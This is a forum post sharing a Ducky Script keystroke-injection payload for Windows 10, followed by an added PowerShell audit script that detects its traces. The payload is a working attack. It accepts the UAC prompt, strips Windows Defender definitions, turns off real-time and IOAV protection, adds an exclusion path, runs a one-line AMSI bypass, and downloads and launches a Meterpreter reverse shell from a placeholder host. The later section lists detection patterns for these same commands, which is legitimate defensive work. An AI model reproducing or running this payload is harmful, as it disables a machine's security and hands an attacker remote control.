mikeOxmaul Posted April 19, 2020

Disclaimer: Originally written in Ducky Script, then converted to Arduino for a school project. The linked video uses an Arduino Pro Micro.

POC: https://youtu.be/3hDdLbwFiM8

REM Title: msfQuack.txt
REM Author: mikeOxmaul (Props: Dan Tentler <Twitter @Viss> and Matt Graeber <Twitter @mattifestation>)
REM Date: 20020308
REM Target: Windows 10 (v. 1809)
REM Assumptions:
REM 1. Used against unlocked device w/ admin lvl privileges
REM 2. Default 'prompt for consent' UAC policy in place for admin accts
REM Script will do the following:
REM 1. Remove Security Definitions for Windows Defender & Disable IOffice AV Protection
REM 2. Disable Real Time Monitoring Protection & Add Exclusion Path
REM 3. Download, Save and Run payload (windows/meterpreter/reverse_tcp)
REM Apologies in advance for the funky delays and not using 'GUI r'. Tested on VirtualBox 6.1 on a macOS host.
REM Payload Start
DELAY 3000
REM 3 second delay for device to register
CTRL ESC
REM keyboard shortcut for search bar
DELAY 1700
STRING cmd
REM searching for cmd prompt
DELAY 750
CTRL SHIFT ENTER
REM 'run as admin' keyboard shortcut
DELAY 2500
ALT y
REM bypass UAC prompt
DELAY 1500
STRING cd %userprofile%
ENTER
DELAY 100
STRING "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
REM Removes all security definitions for windows defender (credit to Dan Tentler)
REM Set-MpPreference is a PowerShell cmdlet, not a cmd command, so the IOAV change is typed in the powershell section below
ENTER
DELAY 100
STRING powershell
ENTER
DELAY 2500
STRING Set-MpPreference -DisableIOAVProtection $true; Set-MpPreference -DisableRealtimeMonitoring $true; Add-MpPreference -ExclusionPath "<define exclusion path here>"
REM Disables IOAV protection and defender's 'real time monitoring', and sets exclusion path in event defender conducts a scan
ENTER
DELAY 100
STRING [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
REM One line AMSI bypass (courtesy of Matt Graeber); typed without surrounding quotes so PowerShell evaluates it instead of echoing a string literal
ENTER
DELAY 100
STRING (New-Object System.Net.WebClient).DownloadFile('http://<ipaddr>/<payload>','<path\to\payload>'); Start-Process '<path\to\payload>'
REM Downloads the payload and runs it (DownloadFile returns nothing, so there is nothing for iex to evaluate)
ENTER
DELAY 100
STRING exit
ENTER
REM Exiting Powershell
DELAY 1000
STRING exit
ENTER
REM End of Payload
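As an added example that is not part of mikeOxmaul's post or script, here is the defender's view of the same payload: a PowerShell audit that checks whether a Windows 10 host has been left in the state msfQuack produces (real-time monitoring and IOAV off, an exclusion path set) and pulls the events those steps generate from the Defender operational log and from PowerShell Script Block Logging. The event IDs are Microsoft's documented Defender IDs; the regex indicators are derived from the commands typed by the script above; the function names are my own. It assumes an elevated session, the Defender PowerShell module (Get-MpPreference) and Script Block Logging (event 4104) enabled.

```powershell
# Added example, not from the original post: audit a host for the Defender
# tampering msfQuack performs. Assumes an elevated session, the Defender
# PowerShell module (Get-MpPreference) and Script Block Logging (event 4104).

# Indicators lifted from the typed commands in the payload (regexes are my own)
$TamperPatterns = @(
    'Set-MpPreference\s+-DisableRealtimeMonitoring',
    'Set-MpPreference\s+-DisableIOAVProtection',
    'Add-MpPreference\s+-ExclusionPath',
    'MpCmdRun\.exe.*-RemoveDefinitions',
    'amsiInitFailed',
    'Net\.WebClient\)\.DownloadFile'
)

# Documented Defender operational-log event IDs that the payload's steps produce
$DefenderEventIds = @{
    5001 = 'Real-time protection disabled'
    5004 = 'Real-time protection configuration changed'
    5007 = 'Antimalware platform configuration changed (new exclusions land here)'
    5010 = 'Scanning for malware disabled'
    5012 = 'Scanning for viruses disabled'
    5013 = 'Tamper protection blocked a change (seen instead of 5001/5007 when Tamper Protection is on)'
}

function Get-DefenderPreferenceFindings {
    # Current state: what the payload leaves behind on the box
    param($Pref = (Get-MpPreference))
    if ($Pref.DisableRealtimeMonitoring) { 'Real-time monitoring is disabled' }
    if ($Pref.DisableIOAVProtection)    { 'IOAV (download/attachment) scanning is disabled' }
    foreach ($p in @($Pref.ExclusionPath)) {
        if ($p) { "Exclusion path configured: $p" }
    }
}

function Get-DefenderEventFindings {
    # Defender log: the moment protection was switched off or reconfigured
    param([object[]] $Events)   # any objects carrying Id, TimeCreated, Message
    foreach ($e in $Events) {
        $id = [int] $e.Id
        if ($DefenderEventIds.ContainsKey($id)) {
            [pscustomobject]@{
                Time   = $e.TimeCreated
                Id     = $id
                Reason = $DefenderEventIds[$id]
                Detail = ($e.Message -split "`r?`n")[0]
            }
        }
    }
}

function Get-ScriptBlockFindings {
    # PowerShell 4104 log: the typed commands themselves, AMSI bypass included
    param([object[]] $Events)
    foreach ($e in $Events) {
        foreach ($pat in $TamperPatterns) {
            if ($e.Message -match $pat) {
                [pscustomobject]@{ Time = $e.TimeCreated; Pattern = $pat }
                break
            }
        }
    }
}

# Live run over the last 24 hours; "No events were found" is silenced deliberately
$since = (Get-Date).AddHours(-24)
Get-DefenderPreferenceFindings
Get-DefenderEventFindings -Events (Get-WinEvent -ErrorAction SilentlyContinue -FilterHashtable @{
    LogName = 'Microsoft-Windows-Windows Defender/Operational'; StartTime = $since })
Get-ScriptBlockFindings -Events (Get-WinEvent -ErrorAction SilentlyContinue -FilterHashtable @{
    LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104; StartTime = $since })
```

The first line of a 5007 message names the setting that changed, so the exclusion path added by the payload shows up there even after an attacker runs Remove-MpPreference to clean up. The 4104 check is the one that also catches the AMSI one-liner, which leaves no Defender event of its own; Script Block Logging records the text before it is executed, so disabling real-time monitoring first does not hide it.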